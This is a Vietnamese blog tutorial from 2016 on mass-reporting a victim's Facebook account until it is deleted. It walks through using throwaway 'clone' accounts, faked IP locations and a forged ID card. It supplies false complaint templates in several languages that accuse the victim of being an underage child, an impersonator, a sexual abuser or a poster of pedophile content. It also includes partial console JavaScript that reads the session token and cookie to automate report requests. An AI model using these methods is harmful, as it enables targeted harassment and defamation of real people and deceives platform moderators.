tut report thốn

Thứ Sáu, 3 tháng 6, 2016

(Tuy không biết clone veri sao chứ nếu các bạn dame clone chưa veri die 100%)
Fake IP Với Ngôn Ngữ Theo Các Tiếng Nhá
Dùng 2Ních Dame TC Nhật Bổn
- それは
〜 Facebookのグループへの
1Clone Dame Hàn Quốc
출생 의 안녕 페이스 북 팀 저놈 아이 가 한 잘못 해 페이스 북 에 가입 합니다. 나는 용어 페이스 북 에 명시된대로 페이스 북 팀 은 해당 계정 을 삭제 요청합니다. 당신은 페이스 북 팀 감사합니다

2Clone Dame Nepal
यो बच्चा को खाता पक्का छु , यो बच्चा फेसबुक प्रयोग गर्न पर्याप्त पुरानो छैन। यो एक नक्कली खाता यो बच्चा को यो फेसबुक खाता प्रस्ताव मेटाउन
1Clone Dame Hoa Kì
i'm sure this is the account of a child, and this child is not old enough to use Facebook. This is a fake account and delete this Facebook account proposals of this child
1clone UK
- Hi Facebook Team
-That child did wrong year of Birth To sign up for Facebook - I request Facebook Team delete that account as terms Facebook set out
- Thank you Facebook team
èCần 9Clone Fake IP ThaiLand F12 Nhập Code này Vào Wall Victim
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var now=(new Date).getTime();
function report(r) {
var X = new XMLHttpRequest();
var XURL = "
var XParams ="fb_dtsg="+fb_dtsg+"&block=1&pp=%7B%22actions_to_take%22%3A%22[]%22%2C%22are_friends%22%3Afalse%2C%22cid%22%3A" + r +"%2C%22content_type%22%3A0%2C%22expand_report%22%3A1%2C%22first_choice%22%3A%22file_report%22%2C%22from_gear%22%3A%22timeline%22%2C%22is_following%22%3Afalse%2C%22is_tagged%22%3Afalse%2C%22on_profile%22%3Afalse%2C%22phase%22%3A3%2C%22ref%22%3A%22https%3A%5C%2F%5C%2Fwww.facebook.com%5C%2F%22%2C%22report_type%22%3A145%2C%22rid%22%3A" + r +"%2C%22sub_report_type%22%3A141%2C%22time_flow_started%22%3A"+now+"%2C%22user%22%3A"+user_id+"%7D&file_report=1&__user="+user_id+"&__a=1&__dyn=7n8ahyj35ynzpQ9UmAWuURDw&__req=h&ttstamp=26581661107112011276&confirmed=1";
X.open("POST", XURL, true);
X.onreadystatechange = function () {
if (X.readyState == 4 && X.status == 200) {
Sau Đó
Fake 1CMND Hoặc Lấy CMND Của Mình Úp Lên
TC1: This account is impersonating my friends , this account created to lower the prestige of me , it makes me scared , I need facebook group to review and delete the account immediately thanks because it is threatening to life and my family.
TC2: Dear FB team I know this account was born to impersonate someone. It harassment to affect the lives of others especially my friends and relatives. I need help, please delete it, to Facebook to become a healthy environment. Please remove it. Thank Team Facebook.
TC3:Account represents a liability company I know, there are accounts of fraud of company employees, this account was young and not qualified to operate Facebook, check the level of resources Clause. It usually comes harassment affects the lives of people khac.Va delete it. Thank you.
Cách rep email gửi về. Khi dùng link https://www.facebook.com/help/contact/295309487309948 Rep đầy đủ như dưới. TC1:Dear Facebook Team,
 - I should call sign of this account. Check help me.
 - Please check again.
 - Please help me. It is an account that was born to forge aims harassment.
 - I hope you'll check soon. I want to have a healthy life. I need to know, and delete accounts. It would affect my personal life ..
- First and last name:
- Birthday:
- E-mail:
- ID: Please remove it, please. Thank group.
TC:2 Hi Facebook Team,
- Please check this account. It is the account was made to impersonate someone else.
- I hope you'll check soon. I want to have a healthy life. I need to know, and delete accounts. It would affect my personal life ..
- First and last name: - Birthday:
- E-mail:
- ID: Please remove it, please. Thank group.
Report Tiếp Dùng Clone Chính nhá(Online Thường Xuyên và Cổ)
Fake IP Hoa Kì Với Ngôn Ngữ English
Chọn 9năm
TC: This account of a child under 13 and it violates a lot of terms facebook upload posing as fake pornography and other people would like facebook group to review and delete the account , and it has used software photoshop to fake its identity cards to verify this account . It has lots of pictures uploaded violent pedophile content . This account is using a fake name to hide its guilt hope facebook group to review and delete this account to not show pornography anymore
Vào tiếp Chọn 10Năm
TC: This account was born harassment and underage use of Facebook. It was under 13. I am loved this child. I need help. Please remove it. Please. Thank you.
Vào Tiếp Chọn 11Năm
TC: Hello Facebook Player of the account holder 1c child under 13 years is not entitled to participate in Facebook Account has been created to overcome the statute of Facebook It is dangerous for the child and the community I asked Facebook Facebook The team immediately close the account
Dame Thêm TUT Sex nữa Là Okay
Fake ip VQA ngôn ngử uk
-Báo cáo tk này
-Tài Khoản Này Nội Dung Không Phù Hợp
-Gợi dục
-Gửi Lên Facebook
Xong vào link
Dòng 1 điền email
Dòng 2 điền tên victimn
Dòng 3 link victim
Dòng 4: Viet Nam
chọn Yes
Link to a news article
điền link này vào:
Xong phần thông tin bổ sung điền:

Here is an account that I knew had sexually abused. facebook group requests please remove this account

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